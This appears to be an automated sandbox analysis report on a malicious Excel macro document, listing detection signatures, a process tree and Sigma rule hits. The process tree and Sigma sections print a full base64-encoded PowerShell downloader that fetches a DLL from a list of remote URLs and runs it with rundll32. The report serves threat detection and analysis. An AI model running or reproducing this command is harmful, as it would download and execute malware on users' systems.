Edit tour

Windows Analysis Report
xxTupY4Fr3.xlsx

Overview

General Information

Sample name:	xxTupY4Fr3.xlsx renamed because original name is a hash value
Original sample name:	de0e224114985b4c013485302d4008736612a023.xlsx
Analysis ID:	1551452
MD5:	b8410c9949aca2147a5bc2cbf301dc96
SHA1:	de0e224114985b4c013485302d4008736612a023
SHA256:	b4f9e80839564b06b9887f79b31d0f017335e286aa610191b317794bff88f9ae
Tags:	xlsxuser-NDA0E
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Document exploit detected (creates forbidden files)

Malicious encrypted Powershell command line found

Multi AV Scanner detection for submitted file

Document contains OLE streams with names of living off the land binaries

Document contains VBA stomped code (only p-code) potentially bypassing AV detection

Document contains an embedded VBA macro which may execute processes

Document contains an embedded VBA with base64 encoded strings

Document contains an embedded macro with GUI obfuscation

Document exploit detected (process start blacklist hit)

Encrypted powershell cmdline option found

Installs new ROOT certificates

Machine Learning detection for sample

Microsoft Office drops suspicious files

Potential dropper URLs found in powershell memory

Sigma detected: File With Uncommon Extension Created By An Office Application

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to detect virtual machines (SLDT)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Document misses a certain OLE stream usually present in this Microsoft Office document type

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Cscript/Wscript Potentially Suspicious Child Process

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores large binary data to the registry

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 3284 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

wscript.exe (PID: 3404 cmdline: wscript c:\programdata\wetidjks.vbs MD5: 045451FA238A75305CC26AC982472367)

cmd.exe (PID: 3436 cmdline: C:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" " MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

powershell.exe (PID: 3464 cmdline: powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A MD5: A575A7610E5F003CC36DF39E07C4BA7D)

cmd.exe (PID: 1888 cmdline: "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

rundll32.exe (PID: 1972 cmdline: c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd MD5: 51138BEEA3E2C21EC44D0932C71762A8)

wscript.exe (PID: 3628 cmdline: wscript c:\programdata\wetidjks.vbs MD5: 045451FA238A75305CC26AC982472367)

cmd.exe (PID: 3660 cmdline: C:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" " MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

powershell.exe (PID: 3688 cmdline: powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A MD5: A575A7610E5F003CC36DF39E07C4BA7D)

cmd.exe (PID: 896 cmdline: "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

rundll32.exe (PID: 804 cmdline: c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd MD5: 51138BEEA3E2C21EC44D0932C71762A8)

wscript.exe (PID: 3804 cmdline: wscript c:\programdata\wetidjks.vbs MD5: 045451FA238A75305CC26AC982472367)

cmd.exe (PID: 3836 cmdline: C:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" " MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

powershell.exe (PID: 3868 cmdline: powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A MD5: A575A7610E5F003CC36DF39E07C4BA7D)

cmd.exe (PID: 2192 cmdline: "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

rundll32.exe (PID: 2684 cmdline: c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd MD5: 51138BEEA3E2C21EC44D0932C71762A8)

cleanup

Sigma Signatures

System Summary

Sigma detected: File With Uncommon Extension Created By An Office Application

Source: File created

Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3284, TargetFilename: c:\programdata\wetidjks.vbs

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A, CommandLine: powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQ

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: wscript c:\programdata\wetidjks.vbs, CommandLine: wscript c:\programdata\wetidjks.vbs, CommandLine|base64offset|contains: +, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3284, ParentProcessName: EXCEL.EXE, ProcessCommandLine: wscript c:\programdata\wetidjks.vbs, ProcessId: 3404, ProcessName: wscript.exe

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHo